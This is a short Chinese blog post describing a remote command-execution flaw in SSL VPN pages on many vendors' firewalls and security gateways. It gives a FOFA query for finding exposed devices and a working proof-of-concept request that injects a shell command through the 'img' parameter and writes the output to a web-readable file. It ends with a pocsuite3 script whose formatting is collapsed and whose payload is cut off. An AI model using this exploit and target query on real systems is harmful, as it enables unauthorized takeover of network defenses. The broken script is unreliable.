免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。

漏洞影响内容

H3C-下一代防火墙

安恒信息-明御安全网关

MAiPU-安全网关

D_Link-下一代防火墙

HUAWEI-公司产品

迈普通信技术股份有限公司安全网关

博达通信-下一代防火墙

任天行网络安全管理系统\安全审计系统

安博通应用网关

烽火网络安全审计

瑞斯康达科技发展股份有限公司安全路由器

任子行网络安全审计系统

绿盟安全审计系统

深圳市鑫塔科技有限公司第二代防火墙

fofa语句

body="/webui/images/default/default/alert_close.jpg"

poc语句加检测

poc语句

GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1

一般出现这个页面就表示漏洞利用成功,可以去ip/sslvpn/cheshi页面查看whoami内容

不过因为是安全设备,你扫快了扫多了,会直接g的

这个是同一个页面,因为在写脚本的时候多次测试,直接显示404了。

poc脚本

脚本用的pocsuite框架

# -*- coding: utf-8 -*-# 2023/12/7 11:59from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPEfrom pocsuite3.api import OrderedDict, OptStringclass Multiple_vendors_RCE(POCBase):author = '炼金术师诸葛亮'createDate = '2023-12-7'name = 'Multiple-vendors-RCE'appName = 'Multiple-vendors-RCE'vulType = 'Command Execution'# 漏洞类型,参见漏洞类型规范表desc = '多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。'# 漏洞简要描述def _verify(self):result = {}path = "/sslvpn/sslvpn_client.php"# 参数url = self.url + pathpayload = "" />

脚本使用